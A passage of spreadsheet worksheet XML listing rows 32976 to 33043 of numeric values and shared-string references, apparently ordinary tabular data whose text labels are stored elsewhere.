      <c r="C32976" s="2" t="s">
        <v>31743</v>
      </c>
      <c r="D32976" s="2">
        <v>1.0</v>
      </c>
      <c r="E32976" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32976" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32977" ht="15.75" customHeight="1">
      <c r="A32977" s="1">
        <v>6039.0</v>
      </c>
      <c r="B32977" s="2">
        <v>4.7586804E7</v>
      </c>
      <c r="C32977" s="2" t="s">
        <v>31744</v>
      </c>
      <c r="D32977" s="2">
        <v>1.0</v>
      </c>
      <c r="E32977" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32977" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32978" ht="15.75" customHeight="1">
      <c r="A32978" s="1">
        <v>6205.0</v>
      </c>
      <c r="B32978" s="2">
        <v>4.7978513E7</v>
      </c>
      <c r="C32978" s="2" t="s">
        <v>31745</v>
      </c>
      <c r="D32978" s="2">
        <v>1.0</v>
      </c>
      <c r="E32978" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32978" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32979" ht="15.75" customHeight="1">
      <c r="A32979" s="1">
        <v>6451.0</v>
      </c>
      <c r="B32979" s="2">
        <v>4.8596991E7</v>
      </c>
      <c r="C32979" s="2" t="s">
        <v>31746</v>
      </c>
      <c r="D32979" s="2">
        <v>1.0</v>
      </c>
      <c r="E32979" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32979" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32980" ht="15.75" customHeight="1">
      <c r="A32980" s="1">
        <v>6698.0</v>
      </c>
      <c r="B32980" s="2">
        <v>4.9199106E7</v>
      </c>
      <c r="C32980" s="2" t="s">
        <v>31747</v>
      </c>
      <c r="D32980" s="2">
        <v>1.0</v>
      </c>
      <c r="E32980" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32980" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32981" ht="15.75" customHeight="1">
      <c r="A32981" s="1">
        <v>6775.0</v>
      </c>
      <c r="B32981" s="2">
        <v>4.9444936E7</v>
      </c>
      <c r="C32981" s="2" t="s">
        <v>31748</v>
      </c>
      <c r="D32981" s="2">
        <v>1.0</v>
      </c>
      <c r="E32981" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32981" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32982" ht="15.75" customHeight="1">
      <c r="A32982" s="1">
        <v>6826.0</v>
      </c>
      <c r="B32982" s="2">
        <v>4.9590546E7</v>
      </c>
      <c r="C32982" s="2" t="s">
        <v>31749</v>
      </c>
      <c r="D32982" s="2">
        <v>1.0</v>
      </c>
      <c r="E32982" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32982" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32983" ht="15.75" customHeight="1">
      <c r="A32983" s="1">
        <v>6865.0</v>
      </c>
      <c r="B32983" s="2">
        <v>4.9679429E7</v>
      </c>
      <c r="C32983" s="2" t="s">
        <v>31750</v>
      </c>
      <c r="D32983" s="2">
        <v>1.0</v>
      </c>
      <c r="E32983" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32983" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32984" ht="15.75" customHeight="1">
      <c r="A32984" s="1">
        <v>6889.0</v>
      </c>
      <c r="B32984" s="2">
        <v>4.977483E7</v>
      </c>
      <c r="C32984" s="2" t="s">
        <v>31751</v>
      </c>
      <c r="D32984" s="2">
        <v>1.0</v>
      </c>
      <c r="E32984" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32984" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32985" ht="15.75" customHeight="1">
      <c r="A32985" s="1">
        <v>6921.0</v>
      </c>
      <c r="B32985" s="2">
        <v>4.9874684E7</v>
      </c>
      <c r="C32985" s="2" t="s">
        <v>31752</v>
      </c>
      <c r="D32985" s="2">
        <v>1.0</v>
      </c>
      <c r="E32985" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32985" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32986" ht="15.75" customHeight="1">
      <c r="A32986" s="1">
        <v>7085.0</v>
      </c>
      <c r="B32986" s="2">
        <v>5.0284667E7</v>
      </c>
      <c r="C32986" s="2" t="s">
        <v>31753</v>
      </c>
      <c r="D32986" s="2">
        <v>1.0</v>
      </c>
      <c r="E32986" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32986" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32987" ht="15.75" customHeight="1">
      <c r="A32987" s="1">
        <v>7286.0</v>
      </c>
      <c r="B32987" s="2">
        <v>5.0797251E7</v>
      </c>
      <c r="C32987" s="2" t="s">
        <v>31754</v>
      </c>
      <c r="D32987" s="2">
        <v>1.0</v>
      </c>
      <c r="E32987" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32987" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32988" ht="15.75" customHeight="1">
      <c r="A32988" s="1">
        <v>7798.0</v>
      </c>
      <c r="B32988" s="2">
        <v>5.220815E7</v>
      </c>
      <c r="C32988" s="2" t="s">
        <v>31755</v>
      </c>
      <c r="D32988" s="2">
        <v>1.0</v>
      </c>
      <c r="E32988" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32988" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32989" ht="15.75" customHeight="1">
      <c r="A32989" s="1">
        <v>7863.0</v>
      </c>
      <c r="B32989" s="2">
        <v>5.2386146E7</v>
      </c>
      <c r="C32989" s="2" t="s">
        <v>31756</v>
      </c>
      <c r="D32989" s="2">
        <v>1.0</v>
      </c>
      <c r="E32989" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32989" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32990" ht="15.75" customHeight="1">
      <c r="A32990" s="1">
        <v>8006.0</v>
      </c>
      <c r="B32990" s="2">
        <v>5.2784878E7</v>
      </c>
      <c r="C32990" s="2" t="s">
        <v>31757</v>
      </c>
      <c r="D32990" s="2">
        <v>1.0</v>
      </c>
      <c r="E32990" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32990" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32991" ht="15.75" customHeight="1">
      <c r="A32991" s="1">
        <v>8223.0</v>
      </c>
      <c r="B32991" s="2">
        <v>5.3334292E7</v>
      </c>
      <c r="C32991" s="2" t="s">
        <v>31758</v>
      </c>
      <c r="D32991" s="2">
        <v>1.0</v>
      </c>
      <c r="E32991" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32991" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32992" ht="15.75" customHeight="1">
      <c r="A32992" s="1">
        <v>8457.0</v>
      </c>
      <c r="B32992" s="2">
        <v>5.3986589E7</v>
      </c>
      <c r="C32992" s="2" t="s">
        <v>31759</v>
      </c>
      <c r="D32992" s="2">
        <v>1.0</v>
      </c>
      <c r="E32992" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32992" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32993" ht="15.75" customHeight="1">
      <c r="A32993" s="1">
        <v>8514.0</v>
      </c>
      <c r="B32993" s="2">
        <v>5.4067421E7</v>
      </c>
      <c r="C32993" s="2" t="s">
        <v>31760</v>
      </c>
      <c r="D32993" s="2">
        <v>1.0</v>
      </c>
      <c r="E32993" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32993" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32994" ht="15.75" customHeight="1">
      <c r="A32994" s="1">
        <v>8880.0</v>
      </c>
      <c r="B32994" s="2">
        <v>5.477403E7</v>
      </c>
      <c r="C32994" s="2" t="s">
        <v>31761</v>
      </c>
      <c r="D32994" s="2">
        <v>1.0</v>
      </c>
      <c r="E32994" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32994" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32995" ht="15.75" customHeight="1">
      <c r="A32995" s="1">
        <v>8884.0</v>
      </c>
      <c r="B32995" s="2">
        <v>5.4783401E7</v>
      </c>
      <c r="C32995" s="2" t="s">
        <v>31762</v>
      </c>
      <c r="D32995" s="2">
        <v>1.0</v>
      </c>
      <c r="E32995" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32995" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32996" ht="15.75" customHeight="1">
      <c r="A32996" s="1">
        <v>9026.0</v>
      </c>
      <c r="B32996" s="2">
        <v>5.5019543E7</v>
      </c>
      <c r="C32996" s="2" t="s">
        <v>31763</v>
      </c>
      <c r="D32996" s="2">
        <v>1.0</v>
      </c>
      <c r="E32996" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32996" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32997" ht="15.75" customHeight="1">
      <c r="A32997" s="1">
        <v>9049.0</v>
      </c>
      <c r="B32997" s="2">
        <v>5.506327E7</v>
      </c>
      <c r="C32997" s="2" t="s">
        <v>31764</v>
      </c>
      <c r="D32997" s="2">
        <v>1.0</v>
      </c>
      <c r="E32997" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32997" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32998" ht="15.75" customHeight="1">
      <c r="A32998" s="1">
        <v>9500.0</v>
      </c>
      <c r="B32998" s="2">
        <v>5.5925394E7</v>
      </c>
      <c r="C32998" s="2" t="s">
        <v>31765</v>
      </c>
      <c r="D32998" s="2">
        <v>1.0</v>
      </c>
      <c r="E32998" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32998" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="32999" ht="15.75" customHeight="1">
      <c r="A32999" s="1">
        <v>9535.0</v>
      </c>
      <c r="B32999" s="2">
        <v>5.5990852E7</v>
      </c>
      <c r="C32999" s="2" t="s">
        <v>31766</v>
      </c>
      <c r="D32999" s="2">
        <v>1.0</v>
      </c>
      <c r="E32999" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32999" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33000" ht="15.75" customHeight="1">
      <c r="A33000" s="1">
        <v>9729.0</v>
      </c>
      <c r="B33000" s="2">
        <v>5.6443848E7</v>
      </c>
      <c r="C33000" s="2" t="s">
        <v>31767</v>
      </c>
      <c r="D33000" s="2">
        <v>1.0</v>
      </c>
      <c r="E33000" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33000" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33001" ht="15.75" customHeight="1">
      <c r="A33001" s="1">
        <v>9888.0</v>
      </c>
      <c r="B33001" s="2">
        <v>5.67595E7</v>
      </c>
      <c r="C33001" s="2" t="s">
        <v>31768</v>
      </c>
      <c r="D33001" s="2">
        <v>1.0</v>
      </c>
      <c r="E33001" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33001" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33002" ht="15.75" customHeight="1">
      <c r="A33002" s="1">
        <v>9946.0</v>
      </c>
      <c r="B33002" s="2">
        <v>5.6885777E7</v>
      </c>
      <c r="C33002" s="2" t="s">
        <v>31769</v>
      </c>
      <c r="D33002" s="2">
        <v>1.0</v>
      </c>
      <c r="E33002" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33002" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33003" ht="15.75" customHeight="1">
      <c r="A33003" s="1">
        <v>10131.0</v>
      </c>
      <c r="B33003" s="2">
        <v>5.7291192E7</v>
      </c>
      <c r="C33003" s="2" t="s">
        <v>31770</v>
      </c>
      <c r="D33003" s="2">
        <v>1.0</v>
      </c>
      <c r="E33003" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33003" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33004" ht="15.75" customHeight="1">
      <c r="A33004" s="1">
        <v>10147.0</v>
      </c>
      <c r="B33004" s="2">
        <v>5.7309062E7</v>
      </c>
      <c r="C33004" s="2" t="s">
        <v>31771</v>
      </c>
      <c r="D33004" s="2">
        <v>1.0</v>
      </c>
      <c r="E33004" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33004" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33005" ht="15.75" customHeight="1">
      <c r="A33005" s="1">
        <v>10190.0</v>
      </c>
      <c r="B33005" s="2">
        <v>5.7391813E7</v>
      </c>
      <c r="C33005" s="2" t="s">
        <v>31772</v>
      </c>
      <c r="D33005" s="2">
        <v>1.0</v>
      </c>
      <c r="E33005" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33005" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33006" ht="15.75" customHeight="1">
      <c r="A33006" s="1">
        <v>10307.0</v>
      </c>
      <c r="B33006" s="2">
        <v>5.7669396E7</v>
      </c>
      <c r="C33006" s="2" t="s">
        <v>31773</v>
      </c>
      <c r="D33006" s="2">
        <v>1.0</v>
      </c>
      <c r="E33006" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33006" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33007" ht="15.75" customHeight="1">
      <c r="A33007" s="1">
        <v>10312.0</v>
      </c>
      <c r="B33007" s="2">
        <v>5.7673231E7</v>
      </c>
      <c r="C33007" s="2" t="s">
        <v>31774</v>
      </c>
      <c r="D33007" s="2">
        <v>1.0</v>
      </c>
      <c r="E33007" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33007" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33008" ht="15.75" customHeight="1">
      <c r="A33008" s="1">
        <v>10366.0</v>
      </c>
      <c r="B33008" s="2">
        <v>7923737.0</v>
      </c>
      <c r="C33008" s="2" t="s">
        <v>31775</v>
      </c>
      <c r="D33008" s="2">
        <v>1.0</v>
      </c>
      <c r="E33008" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33008" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33009" ht="15.75" customHeight="1">
      <c r="A33009" s="1">
        <v>10367.0</v>
      </c>
      <c r="B33009" s="2">
        <v>7923737.0</v>
      </c>
      <c r="C33009" s="2" t="s">
        <v>31776</v>
      </c>
      <c r="D33009" s="2">
        <v>1.0</v>
      </c>
      <c r="E33009" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33009" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33010" ht="15.75" customHeight="1">
      <c r="A33010" s="1">
        <v>10431.0</v>
      </c>
      <c r="B33010" s="2">
        <v>1.0334645E7</v>
      </c>
      <c r="C33010" s="2" t="s">
        <v>31777</v>
      </c>
      <c r="D33010" s="2">
        <v>1.0</v>
      </c>
      <c r="E33010" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33010" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33011" ht="15.75" customHeight="1">
      <c r="A33011" s="1">
        <v>10508.0</v>
      </c>
      <c r="B33011" s="2">
        <v>1.1461744E7</v>
      </c>
      <c r="C33011" s="2" t="s">
        <v>31778</v>
      </c>
      <c r="D33011" s="2">
        <v>1.0</v>
      </c>
      <c r="E33011" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33011" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33012" ht="15.75" customHeight="1">
      <c r="A33012" s="1">
        <v>10532.0</v>
      </c>
      <c r="B33012" s="2">
        <v>1.2335043E7</v>
      </c>
      <c r="C33012" s="2" t="s">
        <v>31779</v>
      </c>
      <c r="D33012" s="2">
        <v>1.0</v>
      </c>
      <c r="E33012" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33012" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33013" ht="15.75" customHeight="1">
      <c r="A33013" s="1">
        <v>10639.0</v>
      </c>
      <c r="B33013" s="2">
        <v>1.4119532E7</v>
      </c>
      <c r="C33013" s="2" t="s">
        <v>31780</v>
      </c>
      <c r="D33013" s="2">
        <v>1.0</v>
      </c>
      <c r="E33013" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33013" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33014" ht="15.75" customHeight="1">
      <c r="A33014" s="1">
        <v>10775.0</v>
      </c>
      <c r="B33014" s="2">
        <v>1.5624467E7</v>
      </c>
      <c r="C33014" s="2" t="s">
        <v>31781</v>
      </c>
      <c r="D33014" s="2">
        <v>1.0</v>
      </c>
      <c r="E33014" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33014" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33015" ht="15.75" customHeight="1">
      <c r="A33015" s="1">
        <v>11165.0</v>
      </c>
      <c r="B33015" s="2">
        <v>1.9597168E7</v>
      </c>
      <c r="C33015" s="2" t="s">
        <v>31782</v>
      </c>
      <c r="D33015" s="2">
        <v>1.0</v>
      </c>
      <c r="E33015" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33015" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33016" ht="15.75" customHeight="1">
      <c r="A33016" s="1">
        <v>11175.0</v>
      </c>
      <c r="B33016" s="2">
        <v>1.9692701E7</v>
      </c>
      <c r="C33016" s="2" t="s">
        <v>31783</v>
      </c>
      <c r="D33016" s="2">
        <v>1.0</v>
      </c>
      <c r="E33016" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33016" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33017" ht="15.75" customHeight="1">
      <c r="A33017" s="1">
        <v>11189.0</v>
      </c>
      <c r="B33017" s="2">
        <v>1.9823827E7</v>
      </c>
      <c r="C33017" s="2" t="s">
        <v>31784</v>
      </c>
      <c r="D33017" s="2">
        <v>1.0</v>
      </c>
      <c r="E33017" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33017" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33018" ht="15.75" customHeight="1">
      <c r="A33018" s="1">
        <v>11481.0</v>
      </c>
      <c r="B33018" s="2">
        <v>2.199227E7</v>
      </c>
      <c r="C33018" s="2" t="s">
        <v>31785</v>
      </c>
      <c r="D33018" s="2">
        <v>1.0</v>
      </c>
      <c r="E33018" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33018" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33019" ht="15.75" customHeight="1">
      <c r="A33019" s="1">
        <v>11593.0</v>
      </c>
      <c r="B33019" s="2">
        <v>2.2893049E7</v>
      </c>
      <c r="C33019" s="2" t="s">
        <v>31786</v>
      </c>
      <c r="D33019" s="2">
        <v>1.0</v>
      </c>
      <c r="E33019" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33019" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33020" ht="15.75" customHeight="1">
      <c r="A33020" s="1">
        <v>11787.0</v>
      </c>
      <c r="B33020" s="2">
        <v>2.4345279E7</v>
      </c>
      <c r="C33020" s="2" t="s">
        <v>31787</v>
      </c>
      <c r="D33020" s="2">
        <v>1.0</v>
      </c>
      <c r="E33020" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33020" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33021" ht="15.75" customHeight="1">
      <c r="A33021" s="1">
        <v>11821.0</v>
      </c>
      <c r="B33021" s="2">
        <v>2.462467E7</v>
      </c>
      <c r="C33021" s="2" t="s">
        <v>31788</v>
      </c>
      <c r="D33021" s="2">
        <v>1.0</v>
      </c>
      <c r="E33021" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33021" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33022" ht="15.75" customHeight="1">
      <c r="A33022" s="1">
        <v>11883.0</v>
      </c>
      <c r="B33022" s="2">
        <v>2.5086627E7</v>
      </c>
      <c r="C33022" s="2" t="s">
        <v>31789</v>
      </c>
      <c r="D33022" s="2">
        <v>1.0</v>
      </c>
      <c r="E33022" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33022" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33023" ht="15.75" customHeight="1">
      <c r="A33023" s="1">
        <v>12192.0</v>
      </c>
      <c r="B33023" s="2">
        <v>2.7482052E7</v>
      </c>
      <c r="C33023" s="2" t="s">
        <v>31790</v>
      </c>
      <c r="D33023" s="2">
        <v>1.0</v>
      </c>
      <c r="E33023" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33023" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33024" ht="15.75" customHeight="1">
      <c r="A33024" s="1">
        <v>12269.0</v>
      </c>
      <c r="B33024" s="2">
        <v>2.8090765E7</v>
      </c>
      <c r="C33024" s="2" t="s">
        <v>31791</v>
      </c>
      <c r="D33024" s="2">
        <v>1.0</v>
      </c>
      <c r="E33024" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33024" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33025" ht="15.75" customHeight="1">
      <c r="A33025" s="1">
        <v>12379.0</v>
      </c>
      <c r="B33025" s="2">
        <v>2.882754E7</v>
      </c>
      <c r="C33025" s="2" t="s">
        <v>31792</v>
      </c>
      <c r="D33025" s="2">
        <v>1.0</v>
      </c>
      <c r="E33025" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33025" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33026" ht="15.75" customHeight="1">
      <c r="A33026" s="1">
        <v>12532.0</v>
      </c>
      <c r="B33026" s="2">
        <v>2.9798344E7</v>
      </c>
      <c r="C33026" s="2" t="s">
        <v>31793</v>
      </c>
      <c r="D33026" s="2">
        <v>1.0</v>
      </c>
      <c r="E33026" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33026" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33027" ht="15.75" customHeight="1">
      <c r="A33027" s="1">
        <v>12825.0</v>
      </c>
      <c r="B33027" s="2">
        <v>3.1625406E7</v>
      </c>
      <c r="C33027" s="2" t="s">
        <v>31794</v>
      </c>
      <c r="D33027" s="2">
        <v>1.0</v>
      </c>
      <c r="E33027" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33027" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33028" ht="15.75" customHeight="1">
      <c r="A33028" s="1">
        <v>13127.0</v>
      </c>
      <c r="B33028" s="2">
        <v>3.3654344E7</v>
      </c>
      <c r="C33028" s="5" t="s">
        <v>31795</v>
      </c>
      <c r="D33028" s="2">
        <v>1.0</v>
      </c>
      <c r="E33028" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33028" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33029" ht="15.75" customHeight="1">
      <c r="A33029" s="1">
        <v>13231.0</v>
      </c>
      <c r="B33029" s="2">
        <v>3.4247148E7</v>
      </c>
      <c r="C33029" s="2" t="s">
        <v>31796</v>
      </c>
      <c r="D33029" s="2">
        <v>1.0</v>
      </c>
      <c r="E33029" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33029" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33030" ht="15.75" customHeight="1">
      <c r="A33030" s="1">
        <v>13321.0</v>
      </c>
      <c r="B33030" s="2">
        <v>3.4596004E7</v>
      </c>
      <c r="C33030" s="2" t="s">
        <v>31797</v>
      </c>
      <c r="D33030" s="2">
        <v>1.0</v>
      </c>
      <c r="E33030" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33030" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33031" ht="15.75" customHeight="1">
      <c r="A33031" s="1">
        <v>13325.0</v>
      </c>
      <c r="B33031" s="2">
        <v>3.4612381E7</v>
      </c>
      <c r="C33031" s="2" t="s">
        <v>31798</v>
      </c>
      <c r="D33031" s="2">
        <v>1.0</v>
      </c>
      <c r="E33031" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33031" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33032" ht="15.75" customHeight="1">
      <c r="A33032" s="1">
        <v>13538.0</v>
      </c>
      <c r="B33032" s="2">
        <v>3.5604528E7</v>
      </c>
      <c r="C33032" s="2" t="s">
        <v>31799</v>
      </c>
      <c r="D33032" s="2">
        <v>1.0</v>
      </c>
      <c r="E33032" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33032" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33033" ht="15.75" customHeight="1">
      <c r="A33033" s="1">
        <v>13763.0</v>
      </c>
      <c r="B33033" s="2">
        <v>3.6509805E7</v>
      </c>
      <c r="C33033" s="2" t="s">
        <v>31800</v>
      </c>
      <c r="D33033" s="2">
        <v>1.0</v>
      </c>
      <c r="E33033" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33033" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33034" ht="15.75" customHeight="1">
      <c r="A33034" s="1">
        <v>13785.0</v>
      </c>
      <c r="B33034" s="2">
        <v>3656782.0</v>
      </c>
      <c r="C33034" s="2" t="s">
        <v>31801</v>
      </c>
      <c r="D33034" s="2">
        <v>1.0</v>
      </c>
      <c r="E33034" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33034" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33035" ht="15.75" customHeight="1">
      <c r="A33035" s="1">
        <v>13815.0</v>
      </c>
      <c r="B33035" s="2">
        <v>3.6700289E7</v>
      </c>
      <c r="C33035" s="2" t="s">
        <v>31802</v>
      </c>
      <c r="D33035" s="2">
        <v>1.0</v>
      </c>
      <c r="E33035" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33035" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33036" ht="15.75" customHeight="1">
      <c r="A33036" s="1">
        <v>13827.0</v>
      </c>
      <c r="B33036" s="2">
        <v>3.6768797E7</v>
      </c>
      <c r="C33036" s="2" t="s">
        <v>31803</v>
      </c>
      <c r="D33036" s="2">
        <v>1.0</v>
      </c>
      <c r="E33036" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33036" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33037" ht="15.75" customHeight="1">
      <c r="A33037" s="1">
        <v>14023.0</v>
      </c>
      <c r="B33037" s="2">
        <v>3.7501257E7</v>
      </c>
      <c r="C33037" s="2" t="s">
        <v>31804</v>
      </c>
      <c r="D33037" s="2">
        <v>1.0</v>
      </c>
      <c r="E33037" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33037" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33038" ht="15.75" customHeight="1">
      <c r="A33038" s="1">
        <v>14032.0</v>
      </c>
      <c r="B33038" s="2">
        <v>3.750169E7</v>
      </c>
      <c r="C33038" s="2" t="s">
        <v>31805</v>
      </c>
      <c r="D33038" s="2">
        <v>1.0</v>
      </c>
      <c r="E33038" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33038" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33039" ht="15.75" customHeight="1">
      <c r="A33039" s="1">
        <v>14190.0</v>
      </c>
      <c r="B33039" s="2">
        <v>3.8166551E7</v>
      </c>
      <c r="C33039" s="2" t="s">
        <v>31806</v>
      </c>
      <c r="D33039" s="2">
        <v>1.0</v>
      </c>
      <c r="E33039" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33039" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33040" ht="15.75" customHeight="1">
      <c r="A33040" s="1">
        <v>14438.0</v>
      </c>
      <c r="B33040" s="2">
        <v>3.930043E7</v>
      </c>
      <c r="C33040" s="2" t="s">
        <v>31807</v>
      </c>
      <c r="D33040" s="2">
        <v>1.0</v>
      </c>
      <c r="E33040" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33040" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33041" ht="15.75" customHeight="1">
      <c r="A33041" s="1">
        <v>14701.0</v>
      </c>
      <c r="B33041" s="2">
        <v>4.0579423E7</v>
      </c>
      <c r="C33041" s="2" t="s">
        <v>31808</v>
      </c>
      <c r="D33041" s="2">
        <v>1.0</v>
      </c>
      <c r="E33041" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33041" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33042" ht="15.75" customHeight="1">
      <c r="A33042" s="1">
        <v>15037.0</v>
      </c>
      <c r="B33042" s="2">
        <v>4.1568833E7</v>
      </c>
      <c r="C33042" s="2" t="s">
        <v>31809</v>
      </c>
      <c r="D33042" s="2">
        <v>1.0</v>
      </c>
      <c r="E33042" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F33042" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="33043" ht="15.75" customHeight="1">
      <c r="A33043" s="1">
        <v>15059.0</v>
      </c>
      <c r="B33043" s="2">
        <v>4.1692348E7</v>
      </c>
